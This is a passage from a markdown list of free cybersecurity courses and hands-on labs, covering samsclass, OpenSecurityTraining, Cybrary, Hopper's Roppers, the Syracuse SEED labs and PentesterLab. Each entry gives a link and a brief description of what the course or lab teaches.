Computer Investigation Specialists exam. - [CNIT 123 - Ethical Hacking and Network Defense](https://samsclass.info/123/123_S17.shtml)<br> Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors. - [CNIT 124 - Advanced Ethical Hacking](https://samsclass.info/124/124_F15.shtml)<br> Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks. - [CNIT 126 - Practical Malware Analysis](https://samsclass.info/126/126_S16.shtml)<br> Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools. - [CNIT 127 - Exploit Development](https://samsclass.info/127/127_S17.shtml)<br> Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals. - [CNIT 128 - Hacking Mobile Devices](https://samsclass.info/128/128_S17.shtml)<br> Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal. - [CNIT 129S: Securing Web Applications](https://samsclass.info/129S/129S_F16.shtml)<br> Techniques used by attackers to breach Web applications, and how to protect them. How to secure authentication, access, databases, and back-end components. How to protect users from each other. How to find common vulnerabilities in compiled code and source code. - [CNIT 140: IT Security Practices](https://samsclass.info/140/140_F16.shtml)<br> Training students for cybersecurity competitions, including CTF events and the [Collegiate Cyberdefense Competition (CCDC)](http://www.nationalccdc.org/). This training will prepare students for employment as security professionals, and if our team does well in the competitions, the competitors will gain recognition and respect which should lead to more and better job offers. - [Violent Python and Exploit Development](https://samsclass.info/127/127_WWC_2014.shtml)<br> In the exploit development section, students will take over vulnerable systems with simple Python scripts. #### Eurecom - Mobile Systems and Smartphone Security (MOBISEC) Hands-On course coverings topics such as mobile ecosystem, the design and architecture of mobile operating systems, application analysis, reverse engineering, malware detection, vulnerability assessment, automatic static and dynamic analysis, and exploitation and mitigation techniques. Besides the slides for the course, there are also multiple challenges covering mobile app development, reversing and exploitation. - [MOBISEC2018](https://mobisec.reyammer.io/) ## Open Security Training OpenSecurityTraining.info is dedicated to sharing training material for computer security classes, on any topic, that are at least one day long. #### Beginner Classes - [Android Forensics & Security Testing](http://opensecuritytraining.info/AndroidForensics.html)<br> This class serves as a foundation for mobile digital forensics, forensics of Android operating systems, and penetration testing of Android applications. - [Certified Information Systems Security Professional (CISSP)® <br>Common Body of Knowledge (CBK)® Review](http://opensecuritytraining.info/CISSP-Main.html)<br> The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting [NSTISSI-4011](http://www.cnss.gov/Assets/pdf/nstissi_4011.pdf), National Training Standard for Information Systems Security Professionals, as required by [DoD 8570.01-M](http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf), Information Assurance Workforce Improvement Program. - [Flow Analysis & Network Hunting](http://opensecuritytraining.info/Flow.html)<br> This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the netflow strengths, operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic trade craft for network situational awareness and networking hunting scenarios. - [Hacking Techniques and Intrusion Detection](http://opensecuritytraining.info/HTID.html)<br> The course is designed to help students gain a detailed insight into the practical and theoretical aspects of advanced topics in hacking techniques and intrusion detection. - [Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86-64.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introduction to ARM](http://opensecuritytraining.info/IntroARM.html)<br> This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor. - [Introduction to Cellular Security](http://opensecuritytraining.info/IntroCellSec.html)<br> This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE. - [Introduction to Network Forensics](http://opensecuritytraining.info/NetworkForensics.html)<br> This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. - [Introduction to Secure Coding](http://opensecuritytraining.info/IntroSecureCoding.html)<br> This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. - [Introduction to Vulnerability Assessment](http://opensecuritytraining.info/IntroductionToVulnerabilityAssessment.html)<br> This is a lecture and lab based class giving an introduction to vulnerability assessment of some common common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies. - [Introduction to Trusted Computing](http://opensecuritytraining.info/IntroToTrustedComputing.html)<br> This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. - [Offensive, Defensive, and Forensic Techniques for Determining Web User Identity](http://opensecuritytraining.info/WebIdentity.html)<br> This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server. - [Pcap Analysis & Network Hunting](http://opensecuritytraining.info/Pcap.html)<br> Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like tcpdump, Wireshark, and ChopShop in several lab exercises that reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges. - [Malware Dynamic Analysis](http://opensecuritytraining.info/MalwareDynamicAnalysis.html)<br> This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding - [Secure Code Review](http://opensecuritytraining.info/SecureCodeReview.html)<br> The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. - [Smart Cards](http://opensecuritytraining.info/SmartCards.html)<br> This course shows how smart cards are different compared to other type of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. - [The Life of Binaries](http://opensecuritytraining.info/LifeOfBinaries.html)<br> Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). - [Understanding Cryptology: Core Concepts](http://opensecuritytraining.info/CryptoCore.html)<br> This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes). - [Understanding Cryptology: Cryptanalysis](http://opensecuritytraining.info/Cryptanalysis.html)<br> A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lecture designed to introduce students to a variety of code-breaking techniques and python labs to solidify those concepts. Unlike its sister class, [Core Concepts](http://opensecuritytraining.info/CryptoCore.html), math is necessary for this topic. #### Intermediate Classes - [Exploits 1: Introduction to Software Exploits](http://opensecuritytraining.info/Exploits1.html)<br> Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed. - [Exploits 2: Exploitation in the Windows Environment](http://opensecuritytraining.info/Exploits2.html)<br> This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP, makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs. - [Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntermediateX86.html)<br> Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. #### Advanced Classes - [Advanced x86: Virtualization with Intel VT-x](http://opensecuritytraining.info/AdvancedX86-VTX.html)<br> The purpose of this course is to provide a hands on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally a discussion of virtualization detection techniques. - [Advanced x86: Introduction to BIOS & SMM](http://opensecuritytraining.info/IntroBIOS.html)<br> We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics. This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else. - [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html)<br> Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. - [Reverse Engineering Malware](http://opensecuritytraining.info/ReverseEngineeringMalware.html)<br> This class picks up where the [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html) course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed. - [Rootkits: What they are, and how to find them](http://opensecuritytraining.info/Rootkits.html)<br> Rootkits are a class of malware which are dedicated to hiding the attacker’s presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. - [The Adventures of a Keystroke: An in-depth look into keylogging on Windows](http://opensecuritytraining.info/Keylogging.html)<br> Keyloggers are one of the most widely used components in malware. Keyboard and mouse are the devices nearly all of the PCs are controlled by, this makes them an important target of malware authors. If someone can record your keystrokes then he can control your whole PC without you noticing. ## Cybrary - Online Cyber Security Training - [CompTIA A+](https://www.cybrary.it/course/comptia-aplus)<br> This course covers the fundamentals of computer technology, basic networking, installation and configuration of PCs, laptops and related hardware, as well as configuring common features for mobile operation systems Android and Apple iOS. - [CompTIA Linux+](https://www.cybrary.it/course/comptia-linux-plus)<br> Our free, self-paced online Linux+ training prepares students with the knowledge to become a certified Linux+ expert, spanning a curriculum that covers Linux maintenance tasks, user assistance and installation and configuration. - [CompTIA Cloud+](https://www.cybrary.it/course/comptia-cloud-plus)<br> Our free, online Cloud+ training addresses the essential knowledge for implementing, managing and maintaining cloud technologies as securely as possible. It covers cloud concepts and models, virtualization, and infrastructure in the cloud. - [CompTIA Network+](https://www.cybrary.it/course/comptia-network-plus)<br> In addition to building one’s networking skill set, this course is also designed to prepare an individual for the Network+ certification exam, a distinction that can open a myriad of job opportunities from major companies - [CompTIA Advanced Security Practitioner](https://www.cybrary.it/course/comptia-casp)<br> In our free online CompTIA CASP training, you’ll learn how to integrate advanced authentication, how to manage risk in the enterprise, how to conduct vulnerability assessments and how to analyze network security concepts and components. - [CompTIA Security+](https://www.cybrary.it/course/comptia-security-plus)<br> Learn about general security concepts, basics of cryptography, communications security and operational and organizational security. With the increase of major security breaches that are occurring, security experts are needed now more than ever. - [ITIL Foundation](https://www.cybrary.it/course/itil)<br> Our online ITIL Foundation training course provides baseline knowledge for IT service management best practices: how to reduce costs, increase enhancements in processes, improve IT productivity and overall customer satisfaction. - [Cryptography](https://www.cybrary.it/course/cryptography)<br> In this online course we will be examining how cryptography is the cornerstone of security technologies, and how through its use of different encryption methods you can protect private or sensitive information from unauthorized access. - [Cisco CCNA](https://www.cybrary.it/course/cisco-ccna)<br> Our free, online, self-paced CCNA training teaches students to install, configure, troubleshoot and operate LAN, WAN and dial access services for medium-sized networks. You’ll also learn how to describe the operation of data networks. - [Virtualization Management](https://www.cybrary.it/course/virtualization-management)<br> Our free, self-paced online Virtualization Management training class focuses on installing, configuring and managing virtualization software. You’ll learn how to work your way around the cloud and how to build the infrastructure for it. - [Penetration Testing and Ethical Hacking](https://www.cybrary.it/course/ethical-hacking)<br> If the idea of hacking as a career excites you, you’ll benefit greatly from completing this training here on Cybrary. You’ll learn how to exploit networks in the manner of an attacker, in order to find out how protect the system from them. - [Computer and Hacking Forensics](https://www.cybrary.it/course/computer-hacking-forensics-analyst)<br> Love the idea of digital forensics investigation? That’s what computer forensics is all about. You’ll learn how to; determine potential online criminal activity at its inception, legally gather evidence, search and investigate wireless attacks. - [Web Application Penetration Testing](https://www.cybrary.it/course/web-application-pen-testing)<br> In this course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment. - [CISA - Certified Information Systems Auditor](https://www.cybrary.it/course/cisa)<br> In order to face the dynamic requirements of meeting enterprise vulnerability management challenges, this course covers the auditing process to ensure that you have the ability to analyze the state of your organization and make changes where needed. - [Secure Coding](https://www.cybrary.it/course/secure-coding)<br> Join industry leader Sunny Wear as she discusses secure coding guidelines and how secure coding is important when it comes to lowering risk and vulnerabilities. Learn about XSS, Direct Object Reference, Data Exposure, Buffer Overflows, & Resource Management. - [NIST 800-171 Controlled Unclassified Information Course](https://www.cybrary.it/course/nist-800-171-controlled-unclassified-information-course)<br> The Cybrary NIST 800-171 course covers the 14 domains of safeguarding controlled unclassified information in non-federal agencies. Basic and derived requirements are presented for each security domain as defined in the NIST 800-171 special publication. - [Advanced Penetration Testing](https://www.cybrary.it/course/advanced-penetration-testing)<br> This course covers how to attack from the web using cross-site scripting, SQL injection attacks, remote and local file inclusion and how to understand the defender of the network you’re breaking into to. You’ll also learn tricks for exploiting a network. - [Intro to Malware Analysis and Reverse Engineering](https://www.cybrary.it/course/malware-analysis)<br> In this course you’ll learn how to perform dynamic and static analysis on all major files types, how to carve malicious executables from documents and how to recognize common malware tactics and debug and disassemble malicious binaries. - [Social Engineering and Manipulation](https://www.cybrary.it/course/social-engineering)<br> In this online, self-paced Social Engineering and Manipulation training class, you will learn how some of the most elegant social engineering attacks take place. Learn to perform these scenarios and what is done during each step of the attack. - [Post Exploitation Hacking](https://www.cybrary.it/course/post-exploitation-hacking)<br> In this free self-paced online training course, you’ll cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting. - [Python for Security Professionals](https://www.cybrary.it/course/python)<br> This course will take you from basic concepts to advanced scripts in just over 10 hours of material, with a focus on networking and security. - [Metasploit](https://www.cybrary.it/course/metasploit)<br> This free Metasploit training class will teach you to utilize the deep capabilities of Metasploit for penetration testing and help you to prepare to run vulnerability assessments for organizations of any size. - [ISC2 CCSP - Certified Cloud Security Professional](https://www.cybrary.it/course/isc2-certified-cloud-security-professional-ccsp)<br> The reality is that attackers never rest, and along with the traditional threats targeting internal networks and systems, an entirely new variety specifically targeting the cloud has emerged. **Executive** - [CISSP - Certified Information Systems Security Professional](https://www.cybrary.it/course/cissp)<br> Our free online CISSP (8 domains) training covers topics ranging from operations security, telecommunications, network and internet security, access control systems and methodology and business continuity planning. - [CISM - Certified Information Security Manager](https://www.cybrary.it/course/cism)<br> Cybrary’s Certified Information Security Manager (CISM) course is a great fit for IT professionals looking to move up in their organization and advance their careers and/or current CISMs looking to learn about the latest trends in the IT industry. - [PMP - Project Management Professional](https://www.cybrary.it/course/project-management-professional)<br> Our free online PMP training course educates on how to initiate, plan and manage a project, as well as the process behind analyzing risk, monitoring and controlling project contracts and how to develop schedules and budgets. - [CRISC - Certified in Risk and Information Systems Control](https://www.cybrary.it/course/crisc)<br> Certified in Risk and Information Systems Control is for IT and business professionals who develop and maintain information system controls, and whose job revolves around security operations and compliance. - [Risk Management Framework](https://www.cybrary.it/course/risk-management-framework)<br> The National Institute of Standards and Technology (NIST) established the Risk Management Framework (RMF) as a set of operational and procedural standards or guidelines that a US government agency must follow to ensure the compliance of its data systems. - [ISC2 CSSLP - Certified Secure Software Life-cycle Professional](https://www.cybrary.it/course/csslp-training)<br> This course helps professionals in the industry build their credentials to advance within their organization, allowing them to learn valuable managerial skills as well as how to apply the best practices to keep organizations systems running well. - [COBIT - Control Objectives for Information and Related Technologies](https://www.cybrary.it/course/cobit)<br> Cybrary’s online COBIT certification program offers an opportunity to learn about all the components of the COBIT 5 framework, covering everything from the business end-to-end to strategies in how effectively managing and governing enterprise IT. - [Corporate Cybersecurity Management](https://www.cybrary.it/course/corporate-cybersecurity-management)<br> Cyber risk, legal considerations and insurance are often overlooked by businesses and this sets them up for major financial devastation should an incident occur. ## Hopper's Roppers Hopper's Roppers is a community dedicated to providing free training to beginners so that they have the best introduction to the field possible and have the knowledge, skills, and confidence required to figure out what the next ten thousand hours will require them to learn. - [Introduction to Computing Fundamentals](https://hoppersroppers.org/course.html)<br> A free, self-paced curriculum designed to give a beginner all of the foundational knowledge and skills required to be successful. It teaches security fundamentals along with building a strong technical foundation that students will build on for years to come. **Learning Objectives:** Linux, Hardware, Networking, Operating Systems, Power User, Scripting **Pre-Reqs:** None - [Introduction to Capture the Flags](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals required to be successful in Capture the Flag competitions and compete in the picoCTF event. Our mentors will track your progress and provide assistance every step of the way. **Learning Objectives:** CTFs, Forensics, Cryptography, Web-Exploitation **Pre-Reqs:** Linux, Scripting - [Introduction to Security](https://hoppersroppers.github.io/courseSecurity.html)<br> Free course designed to teach students security theory and have them execute defensive measures so that they are better prepared against threats online and in the physical world. **Learning Objectives:** Security Theory, Practical Application, Real-World Examples **Pre-Reqs:** None - [Practical Skills Bootcamp](https://hoppersroppers.github.io/bootcamp.html)<br> Our free course to introduce students to Linux fundamentals and Python scripting so that they "Learn Just Enough to be Dangerous". Fastest way to get a beginner up to speed on practical knowledge. **Learning Objectives:** Linux, Scripting **Pre-Reqs:** None Laboratories ============ ## Syracuse University's SEED ### Hands-on Labs for Security Education Started in 2002, funded by a total of 1.3 million dollars from NSF, and now used by hundreds of educational institutes worldwide, the SEED project's objective is to develop hands-on laboratory exercises (called SEED labs) for computer and information security education and help instructors adopt these labs in their curricula. ### Software Security Labs These labs cover some of the most common vulnerabilities in general software. The labs show students how attacks work in exploiting these vulnerabilities. - [Buffer-Overflow Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow)<br> Launching attack to exploit the buffer-overflow vulnerability using shellcode. Conducting experiments with several countermeasures. - [Return-to-libc Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Return_to_libc)<br> Using the return-to-libc technique to defeat the "non-executable stack" countermeasure of the buffer-overflow attack. - [Environment Variable and Set-UID Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Environment_Variable_and_SetUID)<br> This is a redesign of the Set-UID lab (see below). - [Set-UID Program Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Set-UID)<br> Launching attacks on privileged Set-UID root program. Risks of environment variables. Side effects of system(). - [Race-Condition Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Race_Condition)<br> Exploiting the race condition vulnerability in privileged program. Conducting experiments with various countermeasures. - [Format-String Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String)<br> Exploiting the format string vulnerability to crash a program, steal sensitive information, or modify critical data. - [Shellshock Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Shellshock)<br> Launch attack to exploit the Shellshock vulnerability that is discovered in late 2014. ### Network Security Labs These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec). - [TCP/IP Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/TCPIP)<br> Launching attacks to exploit the vulnerabilities of the TCP/IP protocol, including session hijacking, SYN flooding, TCP reset attacks, etc. - [Heartbleed Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Heartbleed)<br> Using the heartbleed attack to steal secrets from a remote server. - [Local DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Local)<br> Using several methods to conduct DNS pharming attacks on computers in a LAN environment. - [Remote DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Remote)<br> Using the Kaminsky method to launch DNS cache poisoning attacks on remote DNS servers. - [Packet Sniffing and Spoofing Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Sniffing_Spoofing)<br> Writing programs to sniff packets sent over the local network; writing programs to spoof various types of packets. - [Linux Firewall Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Linux)<br> Writing a simple packet-filter firewall; playing with Linux's built-in firewall software and web-proxy firewall; experimenting with ways to evade firewalls. - [Firewall-VPN Lab: Bypassing Firewalls using VPN](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_VPN)<br> Implement a simple vpn program (client/server), and use it to bypass firewalls. - [Virtual Private Network (VPN) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/VPN)<br> Design and implement a transport-layer VPN system for Linux, using the TUN/TAP technologies. This project requires at least a month of time to finish, so it is good for final project. - [Minix IPSec Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/IPSec)<br> Implement the IPSec protocol in the Minix operating system and use it to set up Virtual Private Networks. - [Minix Firewall Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Minix)<br> Implementing a simple firewall in Minix operating system. ### Web Security Labs These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities. #### Elgg-Based Labs Elgg is an open-source social-network system. We have modified it for our labs. - [Cross-Site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-Site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_CSRF_Elgg)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Tracking Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_Tracking_Elgg)<br> Experimenting with the web tracking technology to see how users can be checked when they browse the web. - [SQL Injection Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. #### Collabtive-Based Labs Collabtive is an open-source web-based project management system. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/CSRF_Collabtive)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/SQL_Injection_Collabtive)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Browser Access Control Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/Web_SOP_Collabtive)<br> Exploring browser's access control system to understand its security policies. #### PhpBB-Based Labs PhpBB is an open-source web-based message board system, allowing users to post messages. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_CSRF)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [ClickJacking Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/ClickJacking)<br> Launching the ClickJacking attack on a vulnerable web site. Conducting experiments with several countermeasures. ### System Security Labs These labs cover the security mechanisms in operating system, mostly focusing on access control mechanisms in Linux. - [Linux Capability Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/Capability_Exploration)<br> Exploring the POSIX 1.e capability system in Linux to see how privileges can be divided into smaller pieces to ensure the compliance with the Least Privilege principle. - [Role-Based Access Control (RBAC) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/RBAC_Cap)<br> Designing and implementing an integrated access control system for Minix that uses both capability-based and role-based access control mechanisms. Students need to modify the Minix kernel. - [Encrypted File System Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/EFS)<br> Designing and implementing an encrypted file system for Minix. Students need to modify the Minix kernel. ### Cryptography Labs These labs cover three essential concepts in cryptography, including secrete-key encryption, one-way hash function, and public-key encryption and PKI. - [Secret Key Encryption Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Encryption)<br> Exploring the secret-key encryption and its applications using OpenSSL. - [One-Way Hash Function Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Hash)<br> Exploring one-way hash function and its applications using OpenSSL. - [Public-Key Cryptography and PKI Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_PublicKey)<br> Exploring public-key cryptography, digital signature, certificate, and PKI using OpenSSL. ### Mobile Security Labs These labs focus on the smartphone security, covering the most common vulnerabilities and attacks on mobile devices. An Android VM is provided for these labs. - [Android Repackaging Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Repackaging)<br> Insert malicious code inside an existing Android app, and repackage it. - [Android Device Rooting Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Rooting)<br> Develop an OTA (Over-The-Air) package from scratch to root an Android device. ## Pentester Lab There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities. - [From SQL Injection to Shell](https://pentesterlab.com/exercises/from_sqli_to_shell)<br> This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell II](https://pentesterlab.com/exercises/from_sqli_to_shell_II)<br> This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell: PostgreSQL edition](https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition)<br> This exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. - [Web for Pentester](https://pentesterlab.com/exercises/web_for_pentester)<br> This exercise is a set of the most common web vulnerabilities. - [Web for Pentester II](https://pentesterlab.com/exercises/web_for_pentester_II)<br> This exercise is a set of the most common web vulnerabilities. - [PHP Include And Post Exploitation](https://pentesterlab.com/exercises/php_include_and_post_exploitation)<br> This exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. - [Linux Host Review](https://pentesterlab.com/exercises/linux_host_review)<br> This exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog. - [Electronic Code Book](https://pentesterlab.com/exercises/ecb)<br> This exercise explains how you can tamper with an encrypted cookies to access another user's account. - [Rack Cookies and Commands injection](https://pentesterlab.com/exercises/rack_cookies_and_commands_injection)<br> After a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution. - [Padding Oracle](https://pentesterlab.com/exercises/padding_oracle)<br> This course details the exploitation of a weakness in the authentication of a PHP website. The website uses Cipher Block Chaining (CBC) to encrypt information provided by users and use this information to ensure authentication. The application also leaks if the padding is valid when decrypting the information. We will see how this behavior can impact the authentication and how it can be exploited. - [XSS and MySQL 